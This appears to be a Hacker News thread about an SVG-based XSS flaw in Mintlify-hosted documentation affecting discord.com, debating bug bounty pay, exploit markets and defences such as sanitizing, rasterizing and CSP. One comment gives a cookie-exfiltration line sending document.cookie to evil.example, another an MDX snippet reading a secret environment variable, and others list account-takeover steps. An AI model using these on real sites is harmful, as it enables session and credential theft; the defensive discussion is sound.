XSS is not dead, and the web platform's mitigations (setHTML, Trusted Types) are not a panacea. CSP helps but is often configured poorly.
So, this kind of widespread XSS in a vulnerable third party component is indeed concerning.
For another example, there have been two reflected XSS vulns found in Anubis this year, putting any website that deploys it and doesn't patch at risk of JS execution on their origin.
Audit your third-party dependencies!
https://github.com/TecharoHQ/anubis/security/advisories/GHSA...
https://github.com/TecharoHQ/anubis/security/advisories/GHSA...
Anubis is promoting itself as a sort of Cloudflare-esque service to mitigate AI scraping. They also aren't just an open source project relying on gracious donations, there's a paid whitelabel version of the project.
If anything, Anubis should probably be held to a higher standard, given that many more vulnerable people rely on it than on big corporations' offerings (vulnerable as in: an XSS on their site means significant issues fishing it out of spam filters, or bandwidth exhaustion hitting their wallet). Same reason a bug in some random GitHub project somewhere probably has an impact of near zero, but a critical security bug in nginx means the shit has hit the fan. When you write software with a massive audience, you're going to be held to higher standards (if not legally, at least socially).
Not that Anubis' handling of this seems to be bad or anything; both XSS attacks were mitigated, but "won't somebody think of the poor FOSS project" isn't really the right answer here.
The vulnerabilities that command real dollars all have half-lives, and can't be fixed with a single cluster of prod deploys by the victims.
In the end, you are trying to encourage people not to fuck with your shit, instead of playing economic games. Especially with a bunch of teenagers who wouldn't even be fully criminally liable for doing something funny. $4K isn't much today, even for a teenager. Thanks to stupid AI shit like Mintlify, that's worth like 2GB of RAM or something.
It's not just compensation, it's a gesture. And really bad PR.
Could you elaborate on this? I don't fully understand the shorthand here.
what's an example of an existing business process that would make them valuable, just in theory? why do they not exist for xss vulns? why, and in what sense, are they only situational and time-sensitive?
i know you're an expert in this field. i'm not doubting the assertions, just trying to understand them better. if i understand your argument correctly, you're not doubting that the vuln found here could be damaging, only that it could make money for an adversary willing to exploit it?
Yes, evidently not.
Just because on average intelligence agencies or ransomware distributors wouldn't pay big bucks for XSS on Zerodium etc. doesn't mean that's the fair, or wise, price for disclosure. Every bug bounty program is mostly PR mitigation. It's bad PR if you underpay for a disclosed vulnerability that could have ended your business, considering the price of the security audits/practices you cheaped out on. I mean, most bug bounty programs actually pay by scope, not the market price for technically comparable exploits. If you found an XSS vulnerability in an Apple service with this scope, I bet you would have been paid more than $4k.
The lowest tier is $5k. XSS up to $40k. I think we're talking exfiltration of dev credentials...
This is very sad because SVGs often have way smaller file size, and obviously look much better at various scales. If only there was a widely used vector format that does not have any script support and can be easily shared.
The only reliable solution would be an allowlist of safe elements and attributes, but it would quickly cause compat issues unless you spend time curating the rules. I did not find an existing lib doing it at the time, and it was too much effort to maintain it ourselves.
The solution I ended up implementing was having a sandboxed Chromium instance and communicating with it through the dev tools to load the SVG and rasterize it. This allowed uploading SVG files, but it was then served as rasterized PNGs to other users.
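A minimal sketch of that approach using puppeteer instead of raw DevTools protocol (the function shape and details here are mine, not the original implementation):

    // Render an untrusted SVG in a throwaway headless Chromium page and
    // screenshot it, so other users only ever receive a raster PNG.
    import puppeteer from "puppeteer";

    async function rasterizeSvg(svgSource: string): Promise<Uint8Array> {
      const browser = await puppeteer.launch();
      try {
        const page = await browser.newPage();
        // The page holds no cookies or credentials, but disable JS anyway.
        await page.setJavaScriptEnabled(false);
        await page.setContent(svgSource, { waitUntil: "load" });
        const svg = await page.$("svg");
        if (!svg) throw new Error("no <svg> element found");
        return await svg.screenshot({ type: "png" });
      } finally {
        await browser.close();
      }
    }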
(Yes I'm still salty about Flash.)
That wasn't the only reason. Flash was also proprietary, and opaque, and single-vendor, among many other problems with it.
Do you allow SVGs to be uploaded anywhere on your site? This is a PSA that you're probably at risk unless you can find the few hundred lines of code doing the sanitization.
Note to Ruby on Rails developers: your Active Storage uploaded SVGs are not sanitized by default.
Didn’t we do this already with Flash? Why would this lesson not have stuck?
It’s so regular like clockwork that it has to be a nation state doing this to us.
1: https://owasp.org/www-community/vulnerabilities/XML_External...
Whoever decided it should be enabled by default should be put into some sort of cybersecurity jail.
If you must open a possibly infected PDF, do it in the browser; pdf.js is considered mostly safe, and it's kept updated.
In one of my penetration testing training classes, in one of the lessons, we generated a malicious PDF file that would give us a shell when the victim opened it in Adobe.
Granted, it relied on a specific bug in the JavaScript engine of Adobe Reader, so unless they're using a version that's 15 years old, it wouldn't work today, but you can't be too cautious. 0-days can always exist.
The biggest problem, again, is that the vulnerabilities disappear instantaneously when the vendors learn about them; in fact, they disappear in epsilon time once the vulnerabilities are used, which is not how e.g. a mobile browser drive-by works.
I don't have it in front of me, but I'm talking about the "nobody but us" era of exploit markets:
https://en.wikipedia.org/wiki/NOBUS
Where the NSA seemingly was buying anything, even if not worthwhile, as a form of "munitions collection" to be used for future attacks.
edit: this mostly ended in the US because other nations started paying more; add in more regulations (only a handful of companies are allowed to sell these exploits internationally) and software companies starting to adopt basic security practices (along with rolling out their own bug bounties), and it just mostly whimpered away.
Also relevant to the discussion: the book covers how the public exploit markets are exploitative of the workers themselves (low payouts when state actors would pay more), and there have been periods of open revolt too (see the 2009 "No More Free Bugs" movement, also discussed in the book).
Definitely worth it if you aren't aware of this history, I wasn't.
In reality, intelligence agencies today don't even really stockpile mobile platform RCE. The economics and logistics are counterintuitive. Most of the money is made on the "backend", in support/update costs, paid in tranches; CNE vendors have to work hard to keep up with the platforms even when their bugs aren't getting burned. We interviewed Mark Dowd about this last year for the SCW podcast.
Kid was simply born in the wrong era to cash out easy money.
Building reliable exploits is very difficult today, but the sums a reliable exploit on a mainstream mobile platform garners are also very high. Arguably, today is the best time to be doing that kind of work, if you have the talent.
This is also why an `app.` or even better `tenant.` subdomain is always a good idea; it limits the blast radius of mistakes like this.
We've made different product decisions than them. We don't support this, nor do we request access to codebases for Git sync. Both are security issues waiting to happen, no matter how much customers want them.
The reason people want it, though, is for SEO: whether it's true or outdated voodoo, almost everyone believes having their documentation on a subdomain hurts the parent domain. Google says it's not true, SEO experts say it is.
I wish Mintlify the best here – it's stressful to let customers down like this.
I think the answer likely is quite nuanced, for what it's worth.
I've never heard an XSS vulnerability described as a supply-chain attack before though; usually that term is reserved for malicious scripts in package managers or companies putting backdoors in hardware.
As an end user you can't really mitigate this, since the attack happens in the supply chain (Mintlify) and by the time it gets to you it is basically opaque. It's like getting a signed malicious binary: it looks good to you, and the trust model (the browser's origin model) seems to indicate all is fine (like the signature on the binary). But because someone earlier in the supply chain made a mistake, you are now at risk. It's basically moving an XSS up a level into the "supply chain".
If I recall correctly, last week Mintlify wrote a blog post showcasing their impressive(ly complicated) caching architecture, pretending they were doing real engineering, when it turns out nobody there seems to know what they're doing; but they've managed to convince some big names to use them.
Man, it's like everything I hate about modern tech. Good job Eva for finding this one. Starting to think that every AI startup or company that is heavily using gen-ai for coding is probably extremely vulnerable to the simplest of attacks. Might be a way to make some extra spending money lol.
But like, this case isn't really a dependency or supply-chain attack. It's just allowing remote code execution because, idk, the dev who implemented it didn't read the manual and see that MDX can execute arbitrary code or something. Or maybe they vibe coded it, saw it worked, and didn't bother to check. Perhaps it's a supply-chain attack on Discord et al. for using Mintlify; if that's what you meant, then I apologize.
I think you're right that I have an extreme aversion to SFBA-style software development, and partly because of how gen-ai is used there.
The component which ultimately executed the payload in the SVG was the browser, and the backend dependency stack just served it verbatim as specified by the user. This is a 1990s-style XSS fuckup, not anything subtle.
Companies will create bug bounty programs where they set ground rules (like no social engineering), and have guides on how to identify yourself as an ethical hacker.
For example they might send the police to your door, who’ll tell you you’ve violated some 1980s computer security law.
I know 99.99% of cybercrime goes unpunished, but that’s because the attackers are hard to identify, and in distant foreign lands. As a white hat you’re identifiable and maybe in the same country, meaning it’s much easier to prosecute you.
Unfortunately a competitive rate agreed to in advance with a company before we do any pentesting is the only way we have ever been able to get paid fairly for this sort of work. Finding bugs in the wild as this researcher did often gets wildly underpaid relative to the potential impact of the bug, if they pay or take it seriously at all.
These companies should be ashamed paying out so little for this, and it is only a matter of time before they insult the wrong researcher who decides to pursue paths to maximum profit, or maximum damage, with a vuln like this.
So, rough estimate, how much would you have made for this?
Even that is quite cheap compared to letting a blackhat find this.
Ok, you got "https://discord.com/_mintlify/_static/hackerone-a00f3c6c/lma..." to send a controlled payload
But regular users will never hit "https://discord.com/_mintlify/_static/hackerone-a00f3c6c/lma...", so they will never execute your script
I fail to understand how this can be exploited, by whom and in what conditions
You mention one method being a cookie sent to an attacker-controlled domain, but that in itself is a vulnerability, given it's incorrectly scoped (missing HttpOnly & SameSite at least).
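For reference, a hedged Express sketch of what correctly scoped attributes look like (the handler and token here are illustrative):

    // Hardened session cookie: HttpOnly keeps it out of document.cookie,
    // SameSite limits cross-site sends, Secure restricts it to HTTPS.
    import express from "express";

    const app = express();
    app.post("/login", (req, res) => {
      const sessionToken = "opaque-random-token"; // issued server-side in reality
      res.cookie("session", sessionToken, {
        httpOnly: true,
        secure: true,
        sameSite: "lax",
      });
      res.sendStatus(204);
    });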
> the auth token is stored in local storage
Has anyone reported this (rhetorical question)? What in the world could be the justification for this?
In my opinion, any full account takeover via XSS points to a second vulnerability, independent of the XSS itself: changing email/password/phone should require verification back to one of those methods, or at least input of the previous password.
Thankfully the browser prevents sending the cookies cross origin or else this is just a single click exploit.
Edit: I gave too much credit to Discord here. They aren't protecting their tokens correctly.
Apparently one of the other linked posts shows how you can also gain RCE, since the docs are statically pre-rendered and there’s no sandboxing to prevent you from evalling arbitrary JavaScript.
Yep, here it is: https://kibty.town/blog/mintlify/
Also linked in his guide (which I missed) and [here in a separate HN post](https://news.ycombinator.com/item?id=46317546). I think this other author's post is a lot more detailed and arguably more useful to folks reading on HN.
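To make the mechanism concrete: MDX is essentially a programming language in a Markdown costume. Braces and export statements are real JavaScript evaluated when the document is compiled and rendered, so pre-rendering untrusted MDX server-side without a sandbox is effectively eval. A made-up minimal example (the environment variable is just an illustration):

    {/* braces in MDX contain real JavaScript, evaluated at render time */}
    Hello {1 + 1}

    export const leaked = (() => {
      // runs inside the Node process that pre-renders the docs
      return process.env.AWS_SECRET_ACCESS_KEY ?? "not set";
    })();

    Secret: {leaked}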
If you sign a contract with a "hacker", then you are expecting results. Otherwise how do you decide whether to renew the contract next year? How do you decide whether to give them a raise? What if, during this contract, a vulnerability that this individual didn't find is exploited? Do you get rid of them?
So you're putting pressure on a person who is a researcher, not a producer. Which is wrong.
And also there's the scale. Sure, here you have one guy who exploited a vulnerability. But how long did it take them to get there? There are probably dozens of vulnerabilities yet to be exploited, requiring skills so different from this person's that they won't find them, even if you pay them for a full-time position.
Whereas if you set up a bug bounty program, you are basically crowdsourcing your vulnerabilities: not only do you probably have thousands of people actively trying to exploit vulnerabilities in your system, but you also only give money to the ones that do manage to exploit one. You're only paying on results.
Obviously, if the reward is not big enough, they could be tempted to sell them to someone else or use them themselves. But the risk is here no matter how you decide to handle this topic.
I have a friend who at one point had five monitors and 2 computers (actually it might be 3) on his desk and maybe he’s the one doing it right. He keeps his personal stuff and his programming/work stuff completely separate.
Although with the amount of crap I have to install for Windows development, I'm starting to wonder if a base VM image used as a starting point for each project would be cleaner.
Mintlify security is the worst I have ever encountered in a modern SaaS company.
They will leak your data, code, assets, etc. They will know they did this. You will tell them, and they will acknowledge that they knew it happened and didn't tell you.
Your docs site will go down, and you will need to page their engineers to tell them it's down. This will be a surprise to them.
Found by a 16 year old, what a legend.
Also, as someone who maintains a file upload pipeline: I run every SVG through a sanitizer. Tools like DOMPurify remove scripts and enforce a safe subset of the spec. I even go as far as rasterizing user-uploaded vectors to PNG when possible.
However, the bigger issue is mental. Most folks treat SVG like a dumb image when browsers treat it like executable content. Until the platform changes that expectation there will always be an attack surface.
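For anyone copying the sanitizer step, a rough server-side sketch using DOMPurify's SVG profiles (jsdom supplies the DOM; forbidding foreignObject is my own extra caution, not something the comment above specified):

    // Allowlist-based SVG sanitization: only elements/attributes in
    // DOMPurify's SVG profiles survive; everything else is stripped.
    import createDOMPurify from "dompurify";
    import { JSDOM } from "jsdom";

    const DOMPurify = createDOMPurify(new JSDOM("").window);

    function sanitizeSvg(dirty: string): string {
      return DOMPurify.sanitize(dirty, {
        USE_PROFILES: { svg: true, svgFilters: true },
        FORBID_TAGS: ["foreignObject"], // can smuggle HTML/script back in
      });
    }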
With those, an attacker can do the following (all of these are "possible" but not guaranteed; as usual, it depends, and this is off the top of my head):
- I can redirect you to sites I control where I may be able to capture your login credentials.
- I may be able to prompt you to download malware or virus payloads and run them locally.
- I can deface the site you are on, either causing reputational harm for that brand, or leading you to think you're doing one thing when you're actually doing another.
- I may be able to exfiltrate your cookies and auth tokens for that site and potentially act as you (see the sketch after this list).
- I might be able to pivot to other connected sites that use that site's authentication.
- I can prompt, as the site, for escalated access, and you may grant it because you trust that site, thereby potentially gaining access to your machine (it's not that the browsers fully restrict local access, they just require permission).
- Other social engineering attacks, trying to trick you into doing something that grants me more access, information, etc.
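The cookie bullet is often just one line in practice (evil.example stands in for an attacker domain; HttpOnly cookies are immune to this particular read):

    // classic exfiltration an injected script runs on the victim origin
    new Image().src = "https://evil.example/c?d=" + encodeURIComponent(document.cookie);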
goodsite.com loads a script from user-generated-content-site.com/evil.js
evil.js reads and writes all your goodsite.com account data.
The OP site says that .svg files can only run scripts if they are directly opened, not via <img> tags.
So how does the attack work?
As for CORS, they were uploading the SVGs to an account of their own, but then using the vulnerabilities to pivot to other accounts.
I have this feeling with almost all web tools I am required to use nowadays.
No trust.
Something like this (nginx syntax):

    location ~* \.svg$ {
        add_header Content-Security-Policy "script-src 'none'" always;
    }
wouldn't that stop a browser from running scripts, even if the svg file is opened directly? having this be widespread would solve it wholesale.
1. Content security policies should always be used to prevent such scripts (here they would prevent execution of scripts from the SVG).
2. The JavaScript ecosystem should be making `--disallow-code-generation-from-strings` a default recommendation when running NodeJS on the server.
Vercel (and other Node-as-a-service providers) should warn customers who don't use CSP and `--disallow-code-generation-from-strings` that their settings should be improved.
There are a bunch of other NodeJS flags that maybe you should look into too: https://sgued.fr/blog/react-rce/#node-js-mitigations
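A quick way to see that flag in action (file name arbitrary; run with `node --disallow-code-generation-from-strings check.js`):

    // check.js
    try {
      new Function("return 1")(); // same class of sink as eval()
      console.log("code generation allowed -- flag not in effect");
    } catch (err) {
      // with the flag set, V8 throws an EvalError instead of compiling the string
      console.log("blocked:", err.message);
    }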
Imagine just one link in a tweet, support ticket, or email: https://discord.com/_mintlify/static/evil/exploit.svg. If you click it, JavaScript runs on the discord.com origin.
Here's what could happen:
- Your Discord session cookies and token could be stolen, leading to a complete account takeover.
- An attacker could read/write your developer applications & webhooks, allowing them to add or modify bots, reset secrets, and push malicious updates to millions.
- They could access any Discord API endpoint as you, meaning they could join or delete servers, DM friends, or even buy Nitro with your saved payment info.
- They could maybe even harvest OAuth tokens from sites that use "Login with Discord."
Given the potential damage, the $4,000 bounty feels like a slap in the face.
edit: just noticed that HN turned this into a clickable link - this makes it even scarier!
And serves as a reminder that crime does pay.
In the black market, it would have been worth a bit more.
To elaborate: to exploit this you have to convince your target to open a specially crafted link that would look very suspect. The most realistic approach would be to send a shortened link and hope they click on it, that they are logged into discord.com in the browser when they do (most people use the app), etc.
There's no real way to use this to compromise a large number of users without more complex means.
"I'd rather hire a junior dev who knows the latest version of NextJS than a senior dev who is experienced with an earlier version."
This would be a forgivable remark, except the recruiter was aware of the shortsightedness, and likely attempted to coach the hiring manager...
Pathetic for a senior SE but pretty awesome for a 16-year-old up-and-coming hacker.
That's a free car. Free computer. Uber Eats for months.
And my status with my peers as a hacker would be cemented.
I get that bounty amounts are low vs SE salary, but that’s not at all how my 16yo self would see it.
I agree $4,000 is way too low, but a $400k salary is really high, especially for security work.